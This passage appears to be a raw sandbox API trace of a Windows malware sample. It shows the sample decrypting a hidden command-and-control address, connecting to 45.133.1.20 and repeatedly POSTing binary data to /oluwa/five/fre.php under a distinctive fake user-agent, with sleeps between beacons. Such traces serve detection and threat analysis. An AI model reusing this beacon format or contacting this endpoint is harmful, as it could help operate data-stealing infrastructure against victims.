%X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0318.068] GetProcessHeap () returned 0x6a0000 [0318.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0318.068] GetProcessHeap () returned 0x6a0000 [0318.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0318.069] send (s=0xc44, buf=0x6bd460*, len=242, flags=0) returned 242 [0318.069] send (s=0xc44, buf=0x6bb998*, len=159, flags=0) returned 159 [0318.070] GetProcessHeap () returned 0x6a0000 [0318.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0318.070] recv (in: s=0xc44, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0318.144] GetProcessHeap () returned 0x6a0000 [0318.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0318.144] GetProcessHeap () returned 0x6a0000 [0318.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0318.145] GetProcessHeap () returned 0x6a0000 [0318.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df4a8 | out: hHeap=0x6a0000) returned 1 [0318.146] GetProcessHeap () returned 0x6a0000 [0318.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0318.147] closesocket (s=0xc44) returned 0 [0318.149] GetProcessHeap () returned 0x6a0000 [0318.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0318.149] GetProcessHeap () returned 0x6a0000 [0318.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0318.150] GetProcessHeap () returned 0x6a0000 [0318.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0318.150] GetProcessHeap () returned 0x6a0000 [0318.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0318.151] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19ac) returned 0xc44 [0318.153] Sleep (dwMilliseconds=0xea60) [0318.155] GetProcessHeap () returned 0x6a0000 [0318.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0318.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.157] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0318.164] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.180] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0318.198] GetProcessHeap () returned 0x6a0000 [0318.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0318.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.199] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0318.200] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.200] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0318.201] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.201] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0318.201] GetProcessHeap () returned 0x6a0000 [0318.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0318.202] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.213] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0318.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.223] CryptDestroyKey (hKey=0x6ad020) returned 1 [0318.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.224] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0318.224] GetProcessHeap () returned 0x6a0000 [0318.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0318.225] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.225] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0318.225] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.226] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0318.226] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.227] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0318.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.228] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0318.228] GetProcessHeap () returned 0x6a0000 [0318.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0318.228] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0318.228] GetProcessHeap () returned 0x6a0000 [0318.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0318.229] GetProcessHeap () returned 0x6a0000 [0318.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0318.229] GetProcessHeap () returned 0x6a0000 [0318.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0318.229] GetProcessHeap () returned 0x6a0000 [0318.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0318.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.231] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0318.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.236] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0318.245] GetProcessHeap () returned 0x6a0000 [0318.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0318.245] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.246] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0318.246] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.247] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0318.247] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.247] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0318.247] GetProcessHeap () returned 0x6a0000 [0318.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0318.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.251] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0318.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.256] CryptDestroyKey (hKey=0x6ad020) returned 1 [0318.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.257] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0318.257] GetProcessHeap () returned 0x6a0000 [0318.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0318.258] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.258] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0318.259] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.260] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0318.261] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.261] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0318.262] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.262] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0318.262] GetProcessHeap () returned 0x6a0000 [0318.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0318.263] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0318.263] GetProcessHeap () returned 0x6a0000 [0318.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa20 [0318.263] socket (af=2, type=1, protocol=6) returned 0xc48 [0318.263] connect (s=0xc48, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0318.283] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0318.283] GetProcessHeap () returned 0x6a0000 [0318.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0318.284] GetProcessHeap () returned 0x6a0000 [0318.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0318.284] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0318.285] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0318.285] GetProcessHeap () returned 0x6a0000 [0318.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df268 [0318.286] GetProcessHeap () returned 0x6a0000 [0318.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0318.287] GetProcessHeap () returned 0x6a0000 [0318.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0318.287] GetProcessHeap () returned 0x6a0000 [0318.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0318.289] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0318.290] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0318.290] GetProcessHeap () returned 0x6a0000 [0318.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0318.290] GetProcessHeap () returned 0x6a0000 [0318.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0318.291] send (s=0xc48, buf=0x6bd460*, len=242, flags=0) returned 242 [0318.291] send (s=0xc48, buf=0x6bb998*, len=159, flags=0) returned 159 [0318.291] GetProcessHeap () returned 0x6a0000 [0318.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0318.291] recv (in: s=0xc48, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0318.362] GetProcessHeap () returned 0x6a0000 [0318.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0318.363] GetProcessHeap () returned 0x6a0000 [0318.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0318.364] GetProcessHeap () returned 0x6a0000 [0318.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df268 | out: hHeap=0x6a0000) returned 1 [0318.365] GetProcessHeap () returned 0x6a0000 [0318.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0318.366] closesocket (s=0xc48) returned 0 [0318.366] GetProcessHeap () returned 0x6a0000 [0318.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa20 | out: hHeap=0x6a0000) returned 1 [0318.366] GetProcessHeap () returned 0x6a0000 [0318.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0318.367] GetProcessHeap () returned 0x6a0000 [0318.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0318.367] GetProcessHeap () returned 0x6a0000 [0318.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0318.368] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19b0) returned 0xc48 [0318.370] Sleep (dwMilliseconds=0xea60) [0318.372] GetProcessHeap () returned 0x6a0000 [0318.372] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0318.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.374] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0318.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.383] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0318.395] GetProcessHeap () returned 0x6a0000 [0318.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0318.396] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.396] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0318.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.398] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0318.411] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.412] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0318.412] GetProcessHeap () returned 0x6a0000 [0318.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0318.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.414] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0318.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.415] CryptDestroyKey (hKey=0x6ad020) returned 1 [0318.416] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.416] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0318.416] GetProcessHeap () returned 0x6a0000 [0318.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0318.417] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.418] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0318.422] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.422] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0318.423] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.424] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0318.425] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.425] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0318.426] GetProcessHeap () returned 0x6a0000 [0318.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0318.426] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0318.426] GetProcessHeap () returned 0x6a0000 [0318.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0318.427] GetProcessHeap () returned 0x6a0000 [0318.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0318.427] GetProcessHeap () returned 0x6a0000 [0318.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0318.428] GetProcessHeap () returned 0x6a0000 [0318.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0318.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.430] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0318.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.443] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0318.450] GetProcessHeap () returned 0x6a0000 [0318.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0318.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.451] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0318.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.454] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0318.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.455] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0318.455] GetProcessHeap () returned 0x6a0000 [0318.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0318.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.557] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0318.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.558] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0318.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.559] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0318.559] GetProcessHeap () returned 0x6a0000 [0318.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0318.560] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.560] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0318.561] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.561] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0318.562] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.562] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0318.563] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.563] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0318.563] GetProcessHeap () returned 0x6a0000 [0318.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0318.563] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0318.563] GetProcessHeap () returned 0x6a0000 [0318.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa40 [0318.563] socket (af=2, type=1, protocol=6) returned 0xc4c [0318.563] connect (s=0xc4c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0318.591] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0318.591] GetProcessHeap () returned 0x6a0000 [0318.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0318.591] GetProcessHeap () returned 0x6a0000 [0318.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0318.592] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0318.592] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0318.592] GetProcessHeap () returned 0x6a0000 [0318.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dfc28 [0318.593] GetProcessHeap () returned 0x6a0000 [0318.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0318.593] GetProcessHeap () returned 0x6a0000 [0318.593] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0318.593] GetProcessHeap () returned 0x6a0000 [0318.593] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0318.594] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0318.595] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0318.595] GetProcessHeap () returned 0x6a0000 [0318.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0318.595] GetProcessHeap () returned 0x6a0000 [0318.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0318.595] send (s=0xc4c, buf=0x6bd460*, len=242, flags=0) returned 242 [0318.596] send (s=0xc4c, buf=0x6bb998*, len=159, flags=0) returned 159 [0318.596] GetProcessHeap () returned 0x6a0000 [0318.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 